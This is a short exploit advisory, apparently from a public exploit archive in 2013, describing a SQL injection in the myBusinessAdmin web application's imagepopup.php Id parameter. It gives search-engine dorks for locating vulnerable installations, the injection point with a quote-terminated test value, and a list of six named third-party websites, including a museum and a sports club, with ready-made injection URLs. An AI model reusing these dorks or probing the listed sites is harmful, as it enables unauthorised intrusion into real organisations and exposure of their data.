myBusinessAdmin suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
61199fcdd72948288b6ed131c61a7639d0420c74ff9601b8ff95b0b0efc14215
#Exploit Title : myBusinessAdmin (imagepopup.php) SQL Injection Vulnerability
#Author : DevilScreaM
#Date : 22/08/2013
#Category : Web Applications
#Vendor : http://mybusinessadmin.com/
#Product Link : http://www.redcow.ca/products/mybusinessadmin/
#Dork
intext:Powered by myBusinessAdmin & Red Cow Technologies, Inc.
intext:Powered by myBusinessAdmin
inurl:imagepopup.php?Id=
#Vulnerability : SQL Injection Vulnerability
#Tested On : Windows 7 32 Bit (Mozila & Chrome)
#Greetz : Newbie-Security.or.id
SQL Injection Vulnerabilityhttp://site-target/imagepopup.php?Id=[SQLI]
Example http://site-target/imagepopup.php?id=68556'
==========================================================================
Example Sitehttp://www.yorksunburymuseum.com/imagepopup.php?id=68556'http://www.carletonhockey.ca/imagepopup.php?id=89370'http://www.kiraawards.ca/imagepopup.php?id=39851'http://www.tcquilts.com/imagepopup.php?id=15141'http://www.panb.ca/imagepopup.php?id=24455'http://www.frederictonjunction.ca/imagepopup.php?id=89842'